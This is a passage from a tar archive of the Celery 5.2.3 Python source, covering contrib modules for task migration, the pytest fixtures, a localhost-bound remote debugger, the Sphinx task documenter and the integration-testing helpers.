:class:`~kombu.entity.Queue` instance, or 3) any other true value means the specified ``exchange`` and ``routing_key`` arguments will be used. connection (kombu.Connection): Custom connection to use. source: List[Union[str, kombu.Queue]]: Optional list of source queues to use instead of the default (queues in :setting:`task_queues`). This list can also contain :class:`~kombu.entity.Queue` instances. exchange (str, kombu.Exchange): Default destination exchange. routing_key (str): Default destination routing key. limit (int): Limit number of messages to filter. callback (Callable): Callback called after message moved, with signature ``(state, body, message)``. transform (Callable): Optional function to transform the return value (destination) of the filter function. Also supports the same keyword arguments as :func:`start_filter`. To demonstrate, the :func:`move_task_by_id` operation can be implemented like this: .. code-block:: python def is_wanted_task(body, message): if body['id'] == wanted_id: return Queue('foo', exchange=Exchange('foo'), routing_key='foo') move(is_wanted_task) or with a transform: .. code-block:: python def transform(value): if isinstance(value, str): return Queue(value, Exchange(value), value) return value move(is_wanted_task, transform=transform) Note: The predicate may also return a tuple of ``(exchange, routing_key)`` to specify the destination to where the task should be moved, or a :class:`~kombu.entity.Queue` instance. Any other true value means that the task will be moved to the default exchange/routing_key. """ app = app_or_default(app) queues = [_maybe_queue(app, queue) for queue in source or []] or None with app.connection_or_acquire(connection, pool=False) as conn: producer = app.amqp.Producer(conn) state = State() def on_task(body, message): ret = predicate(body, message) if ret: if transform: ret = transform(ret) if isinstance(ret, Queue): maybe_declare(ret, conn.default_channel) ex, rk = ret.exchange.name, ret.routing_key else: ex, rk = expand_dest(ret, exchange, routing_key) republish(producer, message, exchange=ex, routing_key=rk) message.ack() state.filtered += 1 if callback: callback(state, body, message) if limit and state.filtered >= limit: raise StopFiltering() return start_filter(app, conn, on_task, consume_from=queues, **kwargs) def expand_dest(ret, exchange, routing_key): try: ex, rk = ret except (TypeError, ValueError): ex, rk = exchange, routing_key return ex, rk def task_id_eq(task_id, body, message): """Return true if task id equals task_id'.""" return body['id'] == task_id def task_id_in(ids, body, message): """Return true if task id is member of set ids'.""" return body['id'] in ids def prepare_queues(queues): if isinstance(queues, str): queues = queues.split(',') if isinstance(queues, list): queues = dict(tuple(islice(cycle(q.split(':')), None, 2)) for q in queues) if queues is None: queues = {} return queues class Filterer: def __init__(self, app, conn, filter, limit=None, timeout=1.0, ack_messages=False, tasks=None, queues=None, callback=None, forever=False, on_declare_queue=None, consume_from=None, state=None, accept=None, **kwargs): self.app = app self.conn = conn self.filter = filter self.limit = limit self.timeout = timeout self.ack_messages = ack_messages self.tasks = set(str_to_list(tasks) or []) self.queues = prepare_queues(queues) self.callback = callback self.forever = forever self.on_declare_queue = on_declare_queue self.consume_from = [ _maybe_queue(self.app, q) for q in consume_from or list(self.queues) ] self.state = state or State() self.accept = accept def start(self): # start migrating messages. with self.prepare_consumer(self.create_consumer()): try: for _ in eventloop(self.conn, # pragma: no cover timeout=self.timeout, ignore_timeouts=self.forever): pass except socket.timeout: pass except StopFiltering: pass return self.state def update_state(self, body, message): self.state.count += 1 if self.limit and self.state.count >= self.limit: raise StopFiltering() def ack_message(self, body, message): message.ack() def create_consumer(self): return self.app.amqp.TaskConsumer( self.conn, queues=self.consume_from, accept=self.accept, ) def prepare_consumer(self, consumer): filter = self.filter update_state = self.update_state ack_message = self.ack_message if self.tasks: filter = filter_callback(filter, self.tasks) update_state = filter_callback(update_state, self.tasks) ack_message = filter_callback(ack_message, self.tasks) consumer.register_callback(filter) consumer.register_callback(update_state) if self.ack_messages: consumer.register_callback(self.ack_message) if self.callback is not None: callback = partial(self.callback, self.state) if self.tasks: callback = filter_callback(callback, self.tasks) consumer.register_callback(callback) self.declare_queues(consumer) return consumer def declare_queues(self, consumer): # declare all queues on the new broker. for queue in consumer.queues: if self.queues and queue.name not in self.queues: continue if self.on_declare_queue is not None: self.on_declare_queue(queue) try: _, mcount, _ = queue( consumer.channel).queue_declare(passive=True) if mcount: self.state.total_apx += mcount except self.conn.channel_errors: pass def start_filter(app, conn, filter, limit=None, timeout=1.0, ack_messages=False, tasks=None, queues=None, callback=None, forever=False, on_declare_queue=None, consume_from=None, state=None, accept=None, **kwargs): """Filter tasks.""" return Filterer( app, conn, filter, limit=limit, timeout=timeout, ack_messages=ack_messages, tasks=tasks, queues=queues, callback=callback, forever=forever, on_declare_queue=on_declare_queue, consume_from=consume_from, state=state, accept=accept, **kwargs).start() def move_task_by_id(task_id, dest, **kwargs): """Find a task by id and move it to another queue. Arguments: task_id (str): Id of task to find and move. dest: (str, kombu.Queue): Destination queue. transform (Callable): Optional function to transform the return value (destination) of the filter function. **kwargs (Any): Also supports the same keyword arguments as :func:`move`. """ return move_by_idmap({task_id: dest}, **kwargs) def move_by_idmap(map, **kwargs): """Move tasks by matching from a ``task_id: queue`` mapping. Where ``queue`` is a queue to move the task to. Example: >>> move_by_idmap({ ... '5bee6e82-f4ac-468e-bd3d-13e8600250bc': Queue('name'), ... 'ada8652d-aef3-466b-abd2-becdaf1b82b3': Queue('name'), ... '3a2b140d-7db1-41ba-ac90-c36a0ef4ab1f': Queue('name')}, ... queues=['hipri']) """ def task_id_in_map(body, message): return map.get(message.properties['correlation_id']) # adding the limit means that we don't have to consume any more # when we've found everything. return move(task_id_in_map, limit=len(map), **kwargs) def move_by_taskmap(map, **kwargs): """Move tasks by matching from a ``task_name: queue`` mapping. ``queue`` is the queue to move the task to. Example: >>> move_by_taskmap({ ... 'tasks.add': Queue('name'), ... 'tasks.mul': Queue('name'), ... }) """ def task_name_in_map(body, message): return map.get(body['task']) # <- name of task return move(task_name_in_map, **kwargs) def filter_status(state, body, message, **kwargs): print(MOVING_PROGRESS_FMT.format(state=state, body=body, **kwargs)) move_direct = partial(move, transform=worker_direct) move_direct_by_id = partial(move_task_by_id, transform=worker_direct) move_direct_by_idmap = partial(move_by_idmap, transform=worker_direct) move_direct_by_taskmap = partial(move_by_taskmap, transform=worker_direct) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/contrib/pytest.py0000664000175000017500000001513300000000000017525 0ustar00asifasif00000000000000"""Fixtures and testing utilities for :pypi:`pytest `.""" import os from contextlib import contextmanager from typing import TYPE_CHECKING, Any, Mapping, Sequence, Union import pytest if TYPE_CHECKING: from celery import Celery from ..worker import WorkController else: Celery = WorkController = object NO_WORKER = os.environ.get('NO_WORKER') # pylint: disable=redefined-outer-name # Well, they're called fixtures.... def pytest_configure(config): """Register additional pytest configuration.""" # add the pytest.mark.celery() marker registration to the pytest.ini [markers] section # this prevents pytest 4.5 and newer from issuing a warning about an unknown marker # and shows helpful marker documentation when running pytest --markers. config.addinivalue_line( "markers", "celery(**overrides): override celery configuration for a test case" ) @contextmanager def _create_app(enable_logging=False, use_trap=False, parameters=None, **config): # type: (Any, Any, Any, **Any) -> Celery """Utility context used to setup Celery app for pytest fixtures.""" from .testing.app import TestApp, setup_default_app parameters = {} if not parameters else parameters test_app = TestApp( set_as_current=False, enable_logging=enable_logging, config=config, **parameters ) with setup_default_app(test_app, use_trap=use_trap): yield test_app @pytest.fixture(scope='session') def use_celery_app_trap(): # type: () -> bool """You can override this fixture to enable the app trap. The app trap raises an exception whenever something attempts to use the current or default apps. """ return False @pytest.fixture(scope='session') def celery_session_app(request, celery_config, celery_parameters, celery_enable_logging, use_celery_app_trap): # type: (Any, Any, Any, Any, Any) -> Celery """Session Fixture: Return app for session fixtures.""" mark = request.node.get_closest_marker('celery') config = dict(celery_config, **mark.kwargs if mark else {}) with _create_app(enable_logging=celery_enable_logging, use_trap=use_celery_app_trap, parameters=celery_parameters, **config) as app: if not use_celery_app_trap: app.set_default() app.set_current() yield app @pytest.fixture(scope='session') def celery_session_worker( request, # type: Any celery_session_app, # type: Celery celery_includes, # type: Sequence[str] celery_class_tasks, # type: str celery_worker_pool, # type: Any celery_worker_parameters, # type: Mapping[str, Any] ): # type: (...) -> WorkController """Session Fixture: Start worker that lives throughout test suite.""" from .testing import worker if not NO_WORKER: for module in celery_includes: celery_session_app.loader.import_task_module(module) for class_task in celery_class_tasks: celery_session_app.tasks.register(class_task) with worker.start_worker(celery_session_app, pool=celery_worker_pool, **celery_worker_parameters) as w: yield w @pytest.fixture(scope='session') def celery_enable_logging(): # type: () -> bool """You can override this fixture to enable logging.""" return False @pytest.fixture(scope='session') def celery_includes(): # type: () -> Sequence[str] """You can override this include modules when a worker start. You can have this return a list of module names to import, these can be task modules, modules registering signals, and so on. """ return () @pytest.fixture(scope='session') def celery_worker_pool(): # type: () -> Union[str, Any] """You can override this fixture to set the worker pool. The "solo" pool is used by default, but you can set this to return e.g. "prefork". """ return 'solo' @pytest.fixture(scope='session') def celery_config(): # type: () -> Mapping[str, Any] """Redefine this fixture to configure the test Celery app. The config returned by your fixture will then be used to configure the :func:`celery_app` fixture. """ return {} @pytest.fixture(scope='session') def celery_parameters(): # type: () -> Mapping[str, Any] """Redefine this fixture to change the init parameters of test Celery app. The dict returned by your fixture will then be used as parameters when instantiating :class:`~celery.Celery`. """ return {} @pytest.fixture(scope='session') def celery_worker_parameters(): # type: () -> Mapping[str, Any] """Redefine this fixture to change the init parameters of Celery workers. This can be used e. g. to define queues the worker will consume tasks from. The dict returned by your fixture will then be used as parameters when instantiating :class:`~celery.worker.WorkController`. """ return {} @pytest.fixture() def celery_app(request, celery_config, celery_parameters, celery_enable_logging, use_celery_app_trap): """Fixture creating a Celery application instance.""" mark = request.node.get_closest_marker('celery') config = dict(celery_config, **mark.kwargs if mark else {}) with _create_app(enable_logging=celery_enable_logging, use_trap=use_celery_app_trap, parameters=celery_parameters, **config) as app: yield app @pytest.fixture(scope='session') def celery_class_tasks(): """Redefine this fixture to register tasks with the test Celery app.""" return [] @pytest.fixture() def celery_worker(request, celery_app, celery_includes, celery_worker_pool, celery_worker_parameters): # type: (Any, Celery, Sequence[str], str, Any) -> WorkController """Fixture: Start worker in a thread, stop it when the test returns.""" from .testing import worker if not NO_WORKER: for module in celery_includes: celery_app.loader.import_task_module(module) with worker.start_worker(celery_app, pool=celery_worker_pool, **celery_worker_parameters) as w: yield w @pytest.fixture() def depends_on_current_app(celery_app): """Fixture that sets app as current.""" celery_app.set_current() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/rdb.py0000664000175000017500000001163700000000000016751 0ustar00asifasif00000000000000"""Remote Debugger. Introduction ============ This is a remote debugger for Celery tasks running in multiprocessing pool workers. Inspired by a lost post on dzone.com. Usage ----- .. code-block:: python from celery.contrib import rdb from celery import task @task() def add(x, y): result = x + y rdb.set_trace() return result Environment Variables ===================== .. envvar:: CELERY_RDB_HOST ``CELERY_RDB_HOST`` ------------------- Hostname to bind to. Default is '127.0.0.1' (only accessible from localhost). .. envvar:: CELERY_RDB_PORT ``CELERY_RDB_PORT`` ------------------- Base port to bind to. Default is 6899. The debugger will try to find an available port starting from the base port. The selected port will be logged by the worker. """ import errno import os import socket import sys from pdb import Pdb from billiard.process import current_process __all__ = ( 'CELERY_RDB_HOST', 'CELERY_RDB_PORT', 'DEFAULT_PORT', 'Rdb', 'debugger', 'set_trace', ) DEFAULT_PORT = 6899 CELERY_RDB_HOST = os.environ.get('CELERY_RDB_HOST') or '127.0.0.1' CELERY_RDB_PORT = int(os.environ.get('CELERY_RDB_PORT') or DEFAULT_PORT) #: Holds the currently active debugger. _current = [None] _frame = getattr(sys, '_getframe') NO_AVAILABLE_PORT = """\ {self.ident}: Couldn't find an available port. Please specify one using the CELERY_RDB_PORT environment variable. """ BANNER = """\ {self.ident}: Ready to connect: telnet {self.host} {self.port} Type `exit` in session to continue. {self.ident}: Waiting for client... """ SESSION_STARTED = '{self.ident}: Now in session with {self.remote_addr}.' SESSION_ENDED = '{self.ident}: Session with {self.remote_addr} ended.' class Rdb(Pdb): """Remote debugger.""" me = 'Remote Debugger' _prev_outs = None _sock = None def __init__(self, host=CELERY_RDB_HOST, port=CELERY_RDB_PORT, port_search_limit=100, port_skew=+0, out=sys.stdout): self.active = True self.out = out self._prev_handles = sys.stdin, sys.stdout self._sock, this_port = self.get_avail_port( host, port, port_search_limit, port_skew, ) self._sock.setblocking(1) self._sock.listen(1) self.ident = f'{self.me}:{this_port}' self.host = host self.port = this_port self.say(BANNER.format(self=self)) self._client, address = self._sock.accept() self._client.setblocking(1) self.remote_addr = ':'.join(str(v) for v in address) self.say(SESSION_STARTED.format(self=self)) self._handle = sys.stdin = sys.stdout = self._client.makefile('rw') super().__init__(completekey='tab', stdin=self._handle, stdout=self._handle) def get_avail_port(self, host, port, search_limit=100, skew=+0): try: _, skew = current_process().name.split('-') skew = int(skew) except ValueError: pass this_port = None for i in range(search_limit): _sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) _sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) this_port = port + skew + i try: _sock.bind((host, this_port)) except OSError as exc: if exc.errno in [errno.EADDRINUSE, errno.EINVAL]: continue raise else: return _sock, this_port else: raise Exception(NO_AVAILABLE_PORT.format(self=self)) def say(self, m): print(m, file=self.out) def __enter__(self): return self def __exit__(self, *exc_info): self._close_session() def _close_session(self): self.stdin, self.stdout = sys.stdin, sys.stdout = self._prev_handles if self.active: if self._handle is not None: self._handle.close() if self._client is not None: self._client.close() if self._sock is not None: self._sock.close() self.active = False self.say(SESSION_ENDED.format(self=self)) def do_continue(self, arg): self._close_session() self.set_continue() return 1 do_c = do_cont = do_continue def do_quit(self, arg): self._close_session() self.set_quit() return 1 do_q = do_exit = do_quit def set_quit(self): # this raises a BdbQuit exception that we're unable to catch. sys.settrace(None) def debugger(): """Return the current debugger instance, or create if none.""" rdb = _current[0] if rdb is None or not rdb.active: rdb = _current[0] = Rdb() return rdb def set_trace(frame=None): """Set break-point at current location, or a specified frame.""" if frame is None: frame = _frame().f_back return debugger().set_trace(frame) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/sphinx.py0000664000175000017500000000652200000000000017510 0ustar00asifasif00000000000000"""Sphinx documentation plugin used to document tasks. Introduction ============ Usage ----- The Celery extension for Sphinx requires Sphinx 2.0 or later. Add the extension to your :file:`docs/conf.py` configuration module: .. code-block:: python extensions = (..., 'celery.contrib.sphinx') If you'd like to change the prefix for tasks in reference documentation then you can change the ``celery_task_prefix`` configuration value: .. code-block:: python celery_task_prefix = '(task)' # < default With the extension installed `autodoc` will automatically find task decorated objects (e.g. when using the automodule directive) and generate the correct (as well as add a ``(task)`` prefix), and you can also refer to the tasks using `:task:proj.tasks.add` syntax. Use ``.. autotask::`` to alternatively manually document a task. """ from inspect import formatargspec, getfullargspec from sphinx.domains.python import PyFunction from sphinx.ext.autodoc import FunctionDocumenter from celery.app.task import BaseTask class TaskDocumenter(FunctionDocumenter): """Document task definitions.""" objtype = 'task' member_order = 11 @classmethod def can_document_member(cls, member, membername, isattr, parent): return isinstance(member, BaseTask) and getattr(member, '__wrapped__') def format_args(self): wrapped = getattr(self.object, '__wrapped__', None) if wrapped is not None: argspec = getfullargspec(wrapped) if argspec[0] and argspec[0][0] in ('cls', 'self'): del argspec[0][0] fmt = formatargspec(*argspec) fmt = fmt.replace('\\', '\\\\') return fmt return '' def document_members(self, all_members=False): pass def check_module(self): # Normally checks if *self.object* is really defined in the module # given by *self.modname*. But since functions decorated with the @task # decorator are instances living in the celery.local, we have to check # the wrapped function instead. wrapped = getattr(self.object, '__wrapped__', None) if wrapped and getattr(wrapped, '__module__') == self.modname: return True return super().check_module() class TaskDirective(PyFunction): """Sphinx task directive.""" def get_signature_prefix(self, sig): return self.env.config.celery_task_prefix def autodoc_skip_member_handler(app, what, name, obj, skip, options): """Handler for autodoc-skip-member event.""" # Celery tasks created with the @task decorator have the property # that *obj.__doc__* and *obj.__class__.__doc__* are equal, which # trips up the logic in sphinx.ext.autodoc that is supposed to # suppress repetition of class documentation in an instance of the # class. This overrides that behavior. if isinstance(obj, BaseTask) and getattr(obj, '__wrapped__'): if skip: return False return None def setup(app): """Setup Sphinx extension.""" app.setup_extension('sphinx.ext.autodoc') app.add_autodocumenter(TaskDocumenter) app.add_directive_to_domain('py', 'task', TaskDirective) app.add_config_value('celery_task_prefix', '(task)', True) app.connect('autodoc-skip-member', autodoc_skip_member_handler) return { 'parallel_read_safe': True } ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4477506 celery-5.2.3/celery/contrib/testing/0000775000175000017500000000000000000000000017275 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/testing/__init__.py0000664000175000017500000000000000000000000021374 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/testing/app.py0000664000175000017500000000571100000000000020433 0ustar00asifasif00000000000000"""Create Celery app instances used for testing.""" import weakref from contextlib import contextmanager from copy import deepcopy from kombu.utils.imports import symbol_by_name from celery import Celery, _state #: Contains the default configuration values for the test app. DEFAULT_TEST_CONFIG = { 'worker_hijack_root_logger': False, 'worker_log_color': False, 'accept_content': {'json'}, 'enable_utc': True, 'timezone': 'UTC', 'broker_url': 'memory://', 'result_backend': 'cache+memory://', 'broker_heartbeat': 0, } class Trap: """Trap that pretends to be an app but raises an exception instead. This to protect from code that does not properly pass app instances, then falls back to the current_app. """ def __getattr__(self, name): # Workaround to allow unittest.mock to patch this object # in Python 3.8 and above. if name == '_is_coroutine' or name == '__func__': return None print(name) raise RuntimeError('Test depends on current_app') class UnitLogging(symbol_by_name(Celery.log_cls)): """Sets up logging for the test application.""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.already_setup = True def TestApp(name=None, config=None, enable_logging=False, set_as_current=False, log=UnitLogging, backend=None, broker=None, **kwargs): """App used for testing.""" from . import tasks # noqa config = dict(deepcopy(DEFAULT_TEST_CONFIG), **config or {}) if broker is not None: config.pop('broker_url', None) if backend is not None: config.pop('result_backend', None) log = None if enable_logging else log test_app = Celery( name or 'celery.tests', set_as_current=set_as_current, log=log, broker=broker, backend=backend, **kwargs) test_app.add_defaults(config) return test_app @contextmanager def set_trap(app): """Contextmanager that installs the trap app. The trap means that anything trying to use the current or default app will raise an exception. """ trap = Trap() prev_tls = _state._tls _state.set_default_app(trap) class NonTLS: current_app = trap _state._tls = NonTLS() yield _state._tls = prev_tls @contextmanager def setup_default_app(app, use_trap=False): """Setup default app for testing. Ensures state is clean after the test returns. """ prev_current_app = _state.get_current_app() prev_default_app = _state.default_app prev_finalizers = set(_state._on_app_finalizers) prev_apps = weakref.WeakSet(_state._apps) if use_trap: with set_trap(app): yield else: yield _state.set_default_app(prev_default_app) _state._tls.current_app = prev_current_app if app is not prev_current_app: app.close() _state._on_app_finalizers = prev_finalizers _state._apps = prev_apps ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/testing/manager.py0000664000175000017500000001705300000000000021267 0ustar00asifasif00000000000000"""Integration testing utilities.""" import socket import sys from collections import defaultdict from functools import partial from itertools import count from typing import Any, Callable, Dict, Sequence, TextIO, Tuple from kombu.utils.functional import retry_over_time from celery import states from celery.exceptions import TimeoutError from celery.result import AsyncResult, ResultSet from celery.utils.text import truncate from celery.utils.time import humanize_seconds as _humanize_seconds E_STILL_WAITING = 'Still waiting for {0}. Trying again {when}: {exc!r}' humanize_seconds = partial(_humanize_seconds, microseconds=True) class Sentinel(Exception): """Signifies the end of something.""" class ManagerMixin: """Mixin that adds :class:`Manager` capabilities.""" def _init_manager(self, block_timeout=30 * 60.0, no_join=False, stdout=None, stderr=None): # type: (float, bool, TextIO, TextIO) -> None self.stdout = sys.stdout if stdout is None else stdout self.stderr = sys.stderr if stderr is None else stderr self.connerrors = self.app.connection().recoverable_connection_errors self.block_timeout = block_timeout self.no_join = no_join def remark(self, s, sep='-'): # type: (str, str) -> None print(f'{sep}{s}', file=self.stdout) def missing_results(self, r): # type: (Sequence[AsyncResult]) -> Sequence[str] return [res.id for res in r if res.id not in res.backend._cache] def wait_for( self, fun, # type: Callable catch, # type: Sequence[Any] desc="thing", # type: str args=(), # type: Tuple kwargs=None, # type: Dict errback=None, # type: Callable max_retries=10, # type: int interval_start=0.1, # type: float interval_step=0.5, # type: float interval_max=5.0, # type: float emit_warning=False, # type: bool **options # type: Any ): # type: (...) -> Any """Wait for event to happen. The `catch` argument specifies the exception that means the event has not happened yet. """ kwargs = {} if not kwargs else kwargs def on_error(exc, intervals, retries): interval = next(intervals) if emit_warning: self.warn(E_STILL_WAITING.format( desc, when=humanize_seconds(interval, 'in', ' '), exc=exc, )) if errback: errback(exc, interval, retries) return interval return self.retry_over_time( fun, catch, args=args, kwargs=kwargs, errback=on_error, max_retries=max_retries, interval_start=interval_start, interval_step=interval_step, **options ) def ensure_not_for_a_while(self, fun, catch, desc='thing', max_retries=20, interval_start=0.1, interval_step=0.02, interval_max=1.0, emit_warning=False, **options): """Make sure something does not happen (at least for a while).""" try: return self.wait_for( fun, catch, desc=desc, max_retries=max_retries, interval_start=interval_start, interval_step=interval_step, interval_max=interval_max, emit_warning=emit_warning, ) except catch: pass else: raise AssertionError(f'Should not have happened: {desc}') def retry_over_time(self, *args, **kwargs): return retry_over_time(*args, **kwargs) def join(self, r, propagate=False, max_retries=10, **kwargs): if self.no_join: return if not isinstance(r, ResultSet): r = self.app.ResultSet([r]) received = [] def on_result(task_id, value): received.append(task_id) for i in range(max_retries) if max_retries else count(0): received[:] = [] try: return r.get(callback=on_result, propagate=propagate, **kwargs) except (socket.timeout, TimeoutError) as exc: waiting_for = self.missing_results(r) self.remark( 'Still waiting for {}/{}: [{}]: {!r}'.format( len(r) - len(received), len(r), truncate(', '.join(waiting_for)), exc), '!', ) except self.connerrors as exc: self.remark(f'join: connection lost: {exc!r}', '!') raise AssertionError('Test failed: Missing task results') def inspect(self, timeout=3.0): return self.app.control.inspect(timeout=timeout) def query_tasks(self, ids, timeout=0.5): tasks = self.inspect(timeout).query_task(*ids) or {} yield from tasks.items() def query_task_states(self, ids, timeout=0.5): states = defaultdict(set) for hostname, reply in self.query_tasks(ids, timeout=timeout): for task_id, (state, _) in reply.items(): states[state].add(task_id) return states def assert_accepted(self, ids, interval=0.5, desc='waiting for tasks to be accepted', **policy): return self.assert_task_worker_state( self.is_accepted, ids, interval=interval, desc=desc, **policy ) def assert_received(self, ids, interval=0.5, desc='waiting for tasks to be received', **policy): return self.assert_task_worker_state( self.is_accepted, ids, interval=interval, desc=desc, **policy ) def assert_result_tasks_in_progress_or_completed( self, async_results, interval=0.5, desc='waiting for tasks to be started or completed', **policy ): return self.assert_task_state_from_result( self.is_result_task_in_progress, async_results, interval=interval, desc=desc, **policy ) def assert_task_state_from_result(self, fun, results, interval=0.5, **policy): return self.wait_for( partial(self.true_or_raise, fun, results, timeout=interval), (Sentinel,), **policy ) @staticmethod def is_result_task_in_progress(results, **kwargs): possible_states = (states.STARTED, states.SUCCESS) return all(result.state in possible_states for result in results) def assert_task_worker_state(self, fun, ids, interval=0.5, **policy): return self.wait_for( partial(self.true_or_raise, fun, ids, timeout=interval), (Sentinel,), **policy ) def is_received(self, ids, **kwargs): return self._ids_matches_state( ['reserved', 'active', 'ready'], ids, **kwargs) def is_accepted(self, ids, **kwargs): return self._ids_matches_state(['active', 'ready'], ids, **kwargs) def _ids_matches_state(self, expected_states, ids, timeout=0.5): states = self.query_task_states(ids, timeout=timeout) return all( any(t in s for s in [states[k] for k in expected_states]) for t in ids ) def true_or_raise(self, fun, *args, **kwargs): res = fun(*args, **kwargs) if not res: raise Sentinel() return res class Manager(ManagerMixin): """Test helpers for task integration tests.""" def __init__(self, app, **kwargs): self.app = app self._init_manager(**kwargs) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/contrib/testing/mocks.py0000664000175000017500000001007600000000000020767 0ustar00asifasif00000000000000"""Useful mocks for unit testing.""" import numbers from datetime import datetime, timedelta from typing import Any, Mapping, Sequence from unittest.mock import Mock from celery import Celery from celery.canvas import Signature def TaskMessage( name, # type: str id=None, # type: str args=(), # type: Sequence kwargs=None, # type: Mapping callbacks=None, # type: Sequence[Signature] errbacks=None, # type: Sequence[Signature] chain=None, # type: Sequence[Signature] shadow=None, # type: str utc=None, # type: bool **options # type: Any ): # type: (...) -> Any """Create task message in protocol 2 format.""" kwargs = {} if not kwargs else kwargs from kombu.serialization import dumps from celery import uuid id = id or uuid() message = Mock(name=f'TaskMessage-{id}') message.headers = { 'id': id, 'task': name, 'shadow': shadow, } embed = {'callbacks': callbacks, 'errbacks': errbacks, 'chain': chain} message.headers.update(options) message.content_type, message.content_encoding, message.body = dumps( (args, kwargs, embed), serializer='json', ) message.payload = (args, kwargs, embed) return message def TaskMessage1( name, # type: str id=None, # type: str args=(), # type: Sequence kwargs=None, # type: Mapping callbacks=None, # type: Sequence[Signature] errbacks=None, # type: Sequence[Signature] chain=None, # type: Sequence[Signature] **options # type: Any ): # type: (...) -> Any """Create task message in protocol 1 format.""" kwargs = {} if not kwargs else kwargs from kombu.serialization import dumps from celery import uuid id = id or uuid() message = Mock(name=f'TaskMessage-{id}') message.headers = {} message.payload = { 'task': name, 'id': id, 'args': args, 'kwargs': kwargs, 'callbacks': callbacks, 'errbacks': errbacks, } message.payload.update(options) message.content_type, message.content_encoding, message.body = dumps( message.payload, ) return message def task_message_from_sig(app, sig, utc=True, TaskMessage=TaskMessage): # type: (Celery, Signature, bool, Any) -> Any """Create task message from :class:`celery.Signature`. Example: >>> m = task_message_from_sig(app, add.s(2, 2)) >>> amqp_client.basic_publish(m, exchange='ex', routing_key='rkey') """ sig.freeze() callbacks = sig.options.pop('link', None) errbacks = sig.options.pop('link_error', None) countdown = sig.options.pop('countdown', None) if countdown: eta = app.now() + timedelta(seconds=countdown) else: eta = sig.options.pop('eta', None) if eta and isinstance(eta, datetime): eta = eta.isoformat() expires = sig.options.pop('expires', None) if expires and isinstance(expires, numbers.Real): expires = app.now() + timedelta(seconds=expires) if expires and isinstance(expires, datetime): expires = expires.isoformat() return TaskMessage( sig.task, id=sig.id, args=sig.args, kwargs=sig.kwargs, callbacks=[dict(s) for s in callbacks] if callbacks else None, errbacks=[dict(s) for s in errbacks] if errbacks else None, eta=eta, expires=expires, utc=utc, **sig.options ) class _ContextMock(Mock): """Dummy class implementing __enter__ and __exit__. The :keyword:`with` statement requires these to be implemented in the class, not just the instance. """ def __enter__(self): return self def __exit__(self, *exc_info): pass def ContextMock(*args, **kwargs): """Mock that mocks :keyword:`with` statement contexts.""" obj = _ContextMock(*args, **kwargs) obj.attach_mock(_ContextMock(), '__enter__') obj.attach_mock(_ContextMock(), '__exit__') obj.__enter__.return_value = obj # if __exit__ return a value the exception is ignored, # so it must return None here. obj.__exit__.return_value = None return obj ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/testing/tasks.py0000664000175000017500000000032000000000000020767 0ustar00asifasif00000000000000"""Helper tasks for integration tests.""" from celery import shared_task @shared_task(name='celery.ping') def ping(): # type: () -> str """Simple task that just returns 'pong'.""" return 'pong' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/testing/worker.py0000664000175000017500000001270100000000000021161 0ustar00asifasif00000000000000"""Embedded workers for integration tests.""" import os import threading from contextlib import contextmanager from typing import Any, Iterable, Union import celery.worker.consumer from celery import Celery, worker from celery.result import _set_task_join_will_block, allow_join_result from celery.utils.dispatch import Signal from celery.utils.nodenames import anon_nodename WORKER_LOGLEVEL = os.environ.get('WORKER_LOGLEVEL', 'error') test_worker_starting = Signal( name='test_worker_starting', providing_args={}, ) test_worker_started = Signal( name='test_worker_started', providing_args={'worker', 'consumer'}, ) test_worker_stopped = Signal( name='test_worker_stopped', providing_args={'worker'}, ) class TestWorkController(worker.WorkController): """Worker that can synchronize on being fully started.""" def __init__(self, *args, **kwargs): # type: (*Any, **Any) -> None self._on_started = threading.Event() super().__init__(*args, **kwargs) def on_consumer_ready(self, consumer): # type: (celery.worker.consumer.Consumer) -> None """Callback called when the Consumer blueprint is fully started.""" self._on_started.set() test_worker_started.send( sender=self.app, worker=self, consumer=consumer) def ensure_started(self): # type: () -> None """Wait for worker to be fully up and running. Warning: Worker must be started within a thread for this to work, or it will block forever. """ self._on_started.wait() @contextmanager def start_worker( app, # type: Celery concurrency=1, # type: int pool='solo', # type: str loglevel=WORKER_LOGLEVEL, # type: Union[str, int] logfile=None, # type: str perform_ping_check=True, # type: bool ping_task_timeout=10.0, # type: float shutdown_timeout=10.0, # type: float **kwargs # type: Any ): # type: (...) -> Iterable """Start embedded worker. Yields: celery.app.worker.Worker: worker instance. """ test_worker_starting.send(sender=app) with _start_worker_thread(app, concurrency=concurrency, pool=pool, loglevel=loglevel, logfile=logfile, perform_ping_check=perform_ping_check, shutdown_timeout=shutdown_timeout, **kwargs) as worker: if perform_ping_check: from .tasks import ping with allow_join_result(): assert ping.delay().get(timeout=ping_task_timeout) == 'pong' yield worker test_worker_stopped.send(sender=app, worker=worker) @contextmanager def _start_worker_thread(app, concurrency=1, pool='solo', loglevel=WORKER_LOGLEVEL, logfile=None, WorkController=TestWorkController, perform_ping_check=True, shutdown_timeout=10.0, **kwargs): # type: (Celery, int, str, Union[str, int], str, Any, **Any) -> Iterable """Start Celery worker in a thread. Yields: celery.worker.Worker: worker instance. """ setup_app_for_worker(app, loglevel, logfile) if perform_ping_check: assert 'celery.ping' in app.tasks # Make sure we can connect to the broker with app.connection(hostname=os.environ.get('TEST_BROKER')) as conn: 